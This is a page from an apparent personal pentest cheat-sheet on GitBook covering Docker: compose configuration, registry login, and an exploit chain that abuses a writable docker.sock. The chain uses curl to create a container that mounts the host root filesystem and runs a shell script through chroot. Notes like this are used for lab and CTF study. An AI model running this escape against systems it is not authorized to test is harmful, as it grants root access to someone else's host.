Pentest
TryhackmeHackthebox
  • 🐧Linux
    • Lateral Movement
    • PrivilageEsc Linux 👑
  • 🪟Windows
    • Lateral Movement
    • PrivilageEsc Windows 👑
    • Active Directory / SMB
  • ☁️Cloud
    • AWS
    • Docker
    • Azure AD
    • Kubernetes
  • 🛠️Tools
    • File Transfers
    • Shells / Payloads
    • Pivoting / Forwarding
    • Network Enumeration
    • Cracking / Fuzzing / Brute-force
  • 🚐TCP
    • 21 ) FTP
    • 22 ) SSH
    • 25 ) SMTP
    • 53 ) DNS
    • 79 ) Finger
    • 110 ) POP3
    • 143, 993 ) IMAP
    • 389 ) LDAP
    • 443 ) HTTPS
    • 2049 /111 ) NFS /RPC
    • 3128 ) Squid Proxy
    • 3690 ) Subversion
    • 6379 ) Redis
    • 9200 ) Elasticsearch
    • 11211 ) Memcached
    • 24007 & 49152) Gluster
  • 🚎UDP
    • 69 ) TFTP
    • 161 ) SNMP
    • 500, 4500 ) IPsec IKE
    • 623) IPMI
  • 🔟OWASP 10
    • SQLi
    • NoSQLi
    • LFI / XXE
    • Command Injection
    • XSS / HTMLi / (S/C)SRF / SSTI
  • 📚Database
    • Oracle SQL | 1521
    • MSSQL / MYSQL / PSQL
  • 🔗Binary Exploitation
    • Linux
    • Windows
  • 👨‍🚒Red team
    • Reconnaissance
    • Initial Access
    • Persistence Techniques
    • AV Evasion Techniques
  • 🐰Bug Bounty
    • Search Engine
    • Index.html
  • ⌚Links
    • Passwords 1
    • Default Passwords
    • Default passwords 2
  • 🔄Other
    • Git
    • HackerGPT
    • Curl
    • Hints!!
    • Log4j
    • Mobile Sec
    • BookMarks
    • Steganography
    • CMS / Servers / Others
    • Deserialization
    • Tryhackme
  • 🤖Mobile Android Pentest
    • Mobile Sec
    • Drozer
  • Group 1
    • 📦HackTheBox — Writeups
      • 🏴‍☠️HTB - Devvortex
Powered by GitBook
On this page
  1. Cloud

Docker

  • Configurations.

## ------------------| docker-compose.yaml
version: "3"                    ## optional since v1.27.0
services:                
    website:                    ## Service name
        image: nginx            
        ports:
            - "8080:80"
        restart: always         ## Alwasys start when machine reboot
       
         
## ------------------| Start/Stop
### Start/Run
sudo docker-compose up -d
### Stop/Down
sudo docker-compose stop
sudo docker-compose down
  • Is Docker Sock is writable ?

## ------------------| How to check
ls -al /var/run/docker.sock

## ------------------| Web APIs (https://docs.docker.com/engine/api/v1.41/)
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json

## ------------------| Expolit chain 
### Create new container--> map root drive
### We need to know what image we can use; use following command and get RepoTags value.
curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[] | .RepoTags[0]' 

### Create json object in file !!! Remove comments!!!
{
    "Image" : "sandbox", ## <---- RepoTags value
    "Cmd" : ["/bin/sh","-c","chroot /mnt sh -c \"bash /tmp/shell.sh\""], ## <---- shell
    "Binds" : [
        "/:/mnt:rw"
    ]
}

### use curl command to create new container
curl -X POST -H "Content-Type: application/json" -d @shell.json --unix-socket /var/run/docker.sock http://localhost/containers/create           

### Get id value; replace; start
curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
  • Login

## ------------------| Normal login
docker login <URL>

## ------------------| If it has certificate file
mkdir -p /etc/docker/certs.d/<url_name>
cp ca.crt /etc/docker/certs.d/<url_name>/ca.crt
docker login <URL> 

cat /etc/docker/daemon.json 
{                                                                                                                                                                     
   "insecure-registries":["docker.registry.htb:443"]                                                                                                                      
}
PreviousAWSNextAzure AD

Last updated 2 years ago

☁️